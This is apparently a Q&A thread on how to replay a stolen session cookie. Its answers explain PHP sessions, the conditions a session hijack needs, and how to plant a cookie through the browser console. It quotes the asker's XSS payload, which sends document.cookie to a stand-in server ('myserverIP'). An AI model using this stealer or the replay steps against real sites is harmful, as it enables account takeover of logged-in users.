How to use a stolen cookie?

...php writes the cookie into a file. (I think that is one of the normal processes).

From what you wrote above, it seems that there could be some misconception with your understanding on how a session is being created and maintained on a website. When a user logs in to a website, a session id is generated and this id is stored in a special cookie, known as the session cookie, on the client's browser, like this:

PHPSESSID:fgws4j52jcm10dkgw02nd2

At the same time, a session file (or database row) with the same id is created containing variables (such as user name, login time) related to that particular user. These session variables are stored server side and called from the superglobal $_SESSION array when a session is started.

To hijack a session, what you need is a cookie containing the name-value pair like the one above. One precondition is that the victim must be logged in during the attack such that the session file with the stolen id is still fresh on the server. Also, the website must not be doing other extraneous checks (such as user agent or IP address) to thwart hijackers.

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

The javascript you wrote above merely injects a name-value pair in the superglobal $_GET array. What you want is to transmit the name-value pair using your browser cookie, certainly not with the URL.

Most modern browsers store the cookie information in a database such as sqlite. To edit a cookie, you need to access the web console or the developer toolbar which is covered here for Chrome and here for Firefox.


AFAIK, using stolen cookies depends on the browser you are using.
For instance firefox stores cookies in a not-plain-text file cookies.sqlite in which you can't just copy/past the cookie's key/value.
Firebug gives you the ability to add/edit cookies for the targeted website.


You can use JavaScript to set the cookie in your browser:

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

Just need to open a console by pressing F12 or place the JavaScript in a webpage.

See https://stackoverflow.com/questions/14573223/set-cookie-and-get-cookie-with-javascript